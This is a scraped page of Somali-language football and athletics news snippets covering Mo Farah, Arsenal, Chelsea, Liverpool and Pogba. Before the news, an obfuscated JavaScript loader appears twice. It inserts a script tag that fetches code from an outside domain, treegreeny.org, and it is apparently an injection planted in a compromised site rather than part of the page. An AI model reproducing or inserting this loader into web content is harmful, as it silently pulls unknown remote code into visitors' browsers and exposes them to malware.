;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn");
Orodyahanka Soomaaliyeed balse haysta dhalashada dalka Britain Mo Farah ayaa ku guuleystey bilada dahabka ah tartanka orododa caalamka ee 10.000 Mitir isagoo ka yaabsaday saddex orodyahan...
Naadiga Arsenal ayaa guuldaro ku bilowday horyaalka Premier League kadib markii kooxda West Ham ay ugaga adkaatay 2-0.Guuldaradan ayaa ka timid qaladaad uu sameeyay goolhayahooda cusub...
Tababaraha kooxda Chelsea Jose Mourinho ayaa ku eedeeyay shaqaalaha caafimaadka kooxdiisa inay Eden Hazard daweeyn ugu soo carareen intii ay socotay kulankii ay barbaraha la galeen...
Kulanka: Arsenal v West Ham United Garoonka: Emirates Stadium Waqtiga: 3:30pm Saacada Geeska Afrika Garsoore: Martin Atkinson Arsenal ayaa ka bilaabeysa Emirates Stadium maanta wadadii ay...
Kulanka: Stoke City v Liverpool Garoonka: Britannia Stadium Waqtiga: 6pm Saacada Geeska Afrika Garsoore: Anthony Taylor Liverpool ayaa xilli ciyaareedka cusub ku bilaabaneysa iyagoo rajeynaya in...
Waxaan doonayaa inaan u dhaqaaqo Spain:Paul Pogba